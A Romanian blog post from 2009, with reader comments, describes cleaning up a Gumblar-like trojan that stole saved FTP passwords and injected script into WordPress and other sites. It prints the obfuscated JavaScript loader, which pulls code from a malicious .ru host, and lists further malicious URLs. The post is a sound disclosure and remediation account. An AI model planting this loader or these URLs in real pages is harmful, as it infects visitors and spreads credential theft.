Cum am scapat de injectionul javascript <script>/*GNU GPL*/ try{window.onload

Blog > Blogging >

Cum am scapat de injectionul javascript <script>/GNU GPL/ try{window.onload

12 decembrie 2009 - 6:29

Am reusit sa-mi umplu blogul si multe alte alte siteuri cu nenorocirea de mai jos

<script>/*GNU GPL*/ 
try{window.onload = function(){var V9vs0ipwfom 
= document.createElement('script');
V9vs0ipwfom.setAttribute('type', 'text/javascript');
V9vs0ipwfom.setAttribute('id', 'myscript1');
V9vs0ipwfom.setAttribute('src',  'h#&amp;t$^&amp;t#&amp;!^&amp;p$#!#:^/$!!/!&amp;#g))a#(m&amp;!@e!r@)-#)@c&amp;^$o#&amp;
(m@^-&amp;^#(t#@#(w^.^w$$r^)!z(&amp;#u&amp;t&amp;()a)(.&amp;#!p@@$&amp;l!!).)@p)#$l$&amp;a^(y)^@^-(c)^^o^!@@m&amp;!(#.)b&amp;#)(r))(o!
(w!!#n!#b&amp;&amp;a&amp;&amp;(@g#^b$&amp;&amp;a#&amp;r@@#.$#&amp;
(r(u(:$^#8#)0($8!0!&amp;&amp;/((&amp;g)o((&amp;(o@#(g()(l@e!@).^)c^!)@^o^#)m^&amp;!
/&amp;)@g#)$!o(o##&amp;g)l#)!e!&amp;@).^(c!(o(!$m^)^/!@&amp;w!@o(^!r(@!(d@#$p!$r$#
(!&amp;e)s$^s(!.$o#@(r@g^@!/@!#h@p@^.$c@^o&amp;()m^@)/$#)^s$u)r)v!e)@$y$$m&amp;!!o)
(@$n!@k&amp;#@e$(#&amp;$y!#^$.!#c#&amp;o&amp;m!(/&amp;&amp;'
.replace(/@|&amp;|\)|\^|#|\(|\$|\!/ig, ''));
V9vs0ipwfom.setAttribute('defer', 'defer');
document.body.appendChild(V9vs0ipwfom);}} 
catch(e) {}</script>

Cod care rula scriptul de la adrresa http://gamer-com-tw.wrzuta.pl.play-com.brownbagbar.ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/

Cautand pe google am descoperit ca exista mai multe adrese de unde isi lua cod:

http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/
http://google-cn.msn.ca.shoplocal-com.easymusicstore.ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/
http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

AVG si Kaspersky nu au gasit nimic neinregula pe calculator, nici macar nu au observat infectarea, dar din fericire Malwarebytes Anti-Malware si-a facut treaba:

Files Infected:
C:\Documents and Settings\** user **\Start Menu\Programs\Startup\siszyd32.exe (Trojan.Agent)
C:\WINDOWS\system32\av_md.exe (Trojan.Dropper)

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysgif32 (Trojan.Agent)

Ok, Ryan Isra zice ca e o varianta mai noua de Gumblar, un trojan dubios. Cum te infectezi cu el? Probabil intri cu Internet Explorer pe un site infectat si e de ajuns…

Ce face troianul asta?

Fura parolele de ftp memorate de Filezilla (sunt salvate in clar intr-un xml) si Total Commander (parole criptate reversibil) – probabil si alti clienti de ftp – si mai apoi infecteaza in siteurile cu parole ftp memorate tot ce se numeste

index*.php/html
default*.php/html
home*.php/html

*.js

In WordPress fisierele modificate sunt

index.php
wp-admin/index.php
wp-admin/index-extra.php
wp-admin/js/* (toate)
wp-includes/default-filters.php
wp-includes/default-widgets.php
wp-includes/js/* (cam toate)
wp-content/index.php
wp-content/plugins/index.php
wp-content/themes/index.php
–
wp-content/themes/**folder tema**/index.php
wp-content/themes/**folder tema**/home.php (daca exista)
wp-content/themes/**folder tema**/*.js (daca exista)

Solutia?

Scanare si curatare cu Malwarebytes Anti-Malware
Reset Windows
Schimbare parola FTP
Re-upload fisiere infectate daca hostingul nu are un serviciu de backup si un bakup recent al fisierelor.
In cazul WordPress recomand ultima versiune si reuploadarea tuturor fisierelor + verificarea fisierelor temei/temelor instalate

Din fericire Webfactor are backupuri de toate felurile si am reusit sa refac toate siteurile infectate si gazduite la ei, dar din nefericire am infectat foarte multe alte siteuri la care aveam acces FTP.

Subiecte: Anti-virus, FTP, Hosting, Parola, Total Commander, Trojan, Wordpress

O spaga originala » « Cele mai idioate stiri ale zilei

45 reacţii · Comenteaza · Urmăreste comentariile prin RSS

Ryan Isra
Yeah, It might be new version gumblar (but, we should wait the official name of it :D)
Kaspersky Anti-Virus 2009 couldn’t detect it, but Kaspersky Anti-Virus 2010 detected it as unknow threat UDS: DangerousObject.Multi.Generic with High criticality. You could be infected due to Vulnerability of Adobe PDF Reader or Flash Player and your FTP password is saved (in Filezilla).
12 decembrie 2009 · 6:43 · Raspunde · link
- de ce?
  I use Total Commander for FTP access, but I really don’t have any idea how I got infected..
  12 decembrie 2009 · 6:51 · Raspunde · link
- Catalin Stan
  @Ryan
  
  Since you suspect vulnerabilities in Adobe Reader and Flash Player cause malicious code to be run which affects Filezilla, all of them multiplatform software, are we mac users also vulnerable to this?
  
  It would be useful to know what exaclty is the vulnerability?
  13 decembrie 2009 · 19:12 · Raspunde · link
Dexter
nasol moment…. dar e bine sa stiu sa fiu atent sa nu patesc si eu
12 decembrie 2009 · 12:15 · Raspunde · link
Kvl
Mai da o scanare si cu superantispyware, apoi cu drwebcureit…
12 decembrie 2009 · 17:02 · Raspunde · link
f0b0
noroc ca bloggerul nu se infecteaza :)
12 decembrie 2009 · 20:30 · Raspunde · link
CGeorges
Avast il detecteaza din prima!
cineva totusi sa ii anunte si pe cei de pe forumul blogerilor ca e infectat
13 decembrie 2009 · 7:45 · Raspunde · link
Bogdan
Idem…am 4 siteu-uri infectate cu cacaturi din astea. Acum m-am apucat sa fac si eu update si sa schimb temele de wordpress…sunt toate fisierele infectate. Aiurea..:(
13 decembrie 2009 · 10:28 · Raspunde · link
Marius.
Ceva de genul am patit si eu..gasisem imediat codul, l-am scos si am rezolvat cu toate parolele de atunci :)
13 decembrie 2009 · 10:38 · Raspunde · link
dan
get a mac
13 decembrie 2009 · 11:50 · Raspunde · link
- Catalin Stan
  :)
  13 decembrie 2009 · 19:14 · Raspunde · link
Alex
foarte interesant, merci
13 decembrie 2009 · 16:35 · Raspunde · link
Dojo
Sa-mi bag picioarele in ei. Mi-au troznit vreo 10 wordpress-uri. Ce FTP client sa folosesc? Din ala de cripteaza toate cele? Ca FireZilla si TC ies din colectia mea. Shit.
13 decembrie 2009 · 21:03 · Raspunde · link
- L3ST
  Incearca FlashFXP
  13 decembrie 2009 · 23:28 · Raspunde · link
  - Dojo
    Te iubesc ;)
    
    Saru’mana. Acum inca un sfat: ce sistem de operare recomanzi pentru careva de s-a saturat de windoase si de rahaturile astea de virusi. Tre’ sa poata rula niste chestii pentru un designer (corel, photoshop, stuff).
    
    Saru’mana anticipat. Incerc acum flash-fasul asta :)
    14 decembrie 2009 · 0:44 · Raspunde · link
    - L3ST
      Nu-s adeptul alternativei Windows. Totusi cu Windows 7/Firefox/Bitdefender 2010 cu licenta + evitat sa dau click-uri pe site-uri dubioase + evitat sa downloadez chestii dubioase + evitat sa bag stick-uri pe la oameni care n-au treaba cu calculatoarele ma tine virus-free de mult timp. Consider Windows7 foarte ok ca usability, n-as putea sa ma adaptez la Linux indiferent de distributie sau Mac OSX.
      
      ps: prima persoana care ma iubeste ( aproape ) neconditionat :))
      14 decembrie 2009 · 0:56 · Raspunde · link
titi
de ce nu folosesti deep freeze?
14 decembrie 2009 · 21:38 · Raspunde · link
- de ce?
  pentru ca acumulez mereu content nou :)
  15 decembrie 2009 · 8:33 · Raspunde · link
  - paul
    il poti pune pe o alta partitie si dai freeze numai la partitia sistem.
    15 decembrie 2009 · 8:40 · Raspunde · link
    - de ce?
      stiu, am incercat, ma incurca
      15 decembrie 2009 · 9:27 · Raspunde · link
Luxian
Am patit si eu ceva asemanator. La mine insa se petreceau lucrurile putin diferit: ma conectam la ftp cu Total Commander, si colega de apartament, care avea laptopul virusat, reusea sa-mi intercepteze conexiunile si imi fura parolele. Daca ma conectam cu FileZilla nu mi se intampla nimic.

Am facut atunci un script de cautare a fisierelor infectate pe ftp. Si astfel de-virusarea manuala mergea mult mai repede (nu mai trebuia sa caut, si mai si pastra strucura directoarelor – la upload nu mai trebuie sa uploadez manual toate fisierele).

Sunt dispus sa ajut cu configurarea si rularea respectivului script pentru cei care aveti problema acesta.
15 decembrie 2009 · 9:56 · Raspunde · link
Cristi
Si eu am patit ceva asemanator dupa ce am renuntat la kaspersky si am pus avg.
mi-au fost infectate cu aceasta mizerie 9 site-uri.
am gasit un fisier remove-virus.php care odata pus in radacina si accesat face curatenie.
Fisierul il puteti lua de aici: http://seoforums.org/site-opti.....n-var.html
am lucrat cu filezilla si totalcommander, iar acum dupa schimbarea parolelor m-am hotarat sa raman la totacmd si sa nu mai introduc parolele in fereastra de conectare. Cred ca este cea mai sigura varianta.
16 decembrie 2009 · 0:48 · Raspunde · link
teo
numai amatorii pot pati asa ceva. lasati pe altii sa faca treaba.. voi cumparati-va un playstation si distrati-va.
17 decembrie 2009 · 18:57 · Raspunde · link
krossfire
O sa ignor ultimul comentariu care e intre distractiv si stupid si o sa trec la subiect : Deci pentru siguranta finala, pe langa softuletul de la Malwarebytes si SuperAntiSpyware mai e vreo recomandare ? (Eu oricum cred ca l-am zburat din sistem dar ramane in continuare online pana cand se trezeste hostul – nu pot schimba FTP-ul fara permisiune, draguta treaba)
20 decembrie 2009 · 16:12 · Raspunde · link
- de ce?
  cam atat.. zic
  20 decembrie 2009 · 21:44 · Raspunde · link
krossfire
Saru’mana, utila informatia oricum :)
20 decembrie 2009 · 22:05 · Raspunde · link
- de ce?
  am impresia ca ultimul update de adobe flash nu mai face posibil exploitul ca desktopul nu mi l-am infectat, desi am intrat pe multe siteuri virusate…
  20 decembrie 2009 · 22:08 · Raspunde · link
krossfire
Da, nici la mine nu mai e pe desktop. Acum am rezolvat cu hostingul (se poate schimba parola dar printr-un alt protocol) si sper sa curat complet si blogul.
21 decembrie 2009 · 10:42 · Raspunde · link
my coffe-break
:d se poate sa mai existe ceva bucati “naspa de cod”
kaspersky internet security 2010 semnaleaza ceva pb :
22/12/2009 10:54:45 Denied: Trojan-Clicker.JS.Iframe.db http://gamer-com-tw.wrzuta.pl......onkey.com/
22 decembrie 2009 · 10:57 · Raspunde · link
Mihai
Si cumva acest trojan se infiltreaza si pe bloguri free de pe wordpress.com? Ca mi-e un pic teama!Eu folosesc Avira pentru antivirus si nu am avut probleme pana acum.
23 decembrie 2009 · 11:08 · Raspunde · link
Mircea Popescu
Mnoa, iote c-am scapat. Sa-mi dau un bonus ma gandesc ? Sa-mi dau. Vodka ? Vodka.

Boon.
23 decembrie 2009 · 20:31 · Raspunde · link
Andrei
Parerea mea ca daca aveti un antivirus bun licentiat sau nelicentiat gen Avast e mult mai bine !!!
3 ianuarie 2010 · 2:29 · Raspunde · link
Alex
Andrei are dreptate intrun fel ….
3 ianuarie 2010 · 2:30 · Raspunde · link
octavian
Una dintre cele mai sigure metode de a scapa de rahaturi de astea e sa aveti siturile hostuite undeva, unde puteti folosi sftp(sau ssh), si ca program de conectare folositi winscp- ala suporta sftp si e free.

Problema la transferul prin ftp, e ca transmite datele de logare in clar.
Ca antivirale – avast , dar mai e si esetul care si blocheaza instant descarcarea fisierelor infectate, pt ca porcaria aia de siszyd te chinui o gramada sa o stergi.

Ca OS, macul e tot la putere, ca pe ala nu il infectezi cu 1 cu 2

Sau se mai poate folosi 1 sistem dual Ubuntu cu windoase,
Eu am trecut pe mac dupa ce am luat gumblar ala de 2 ori

1 data mi-a infectat fisierele, iar a 2 -a oara pe 1 server dedicat a prins parola de la un user cu drepturi mai multe si au sters tot ce s-a putut din directorul home
8 ianuarie 2010 · 23:20 · Raspunde · link
Cristina
Ce fain! Se pare ca e in trend virusul asta. M-am pricopsit si eu cu el. Offf.. De ce sper ca nu de la tine, ca azi am intrat pe situl tau, azi l-am luat:)
12 februarie 2010 · 23:32 · Raspunde · link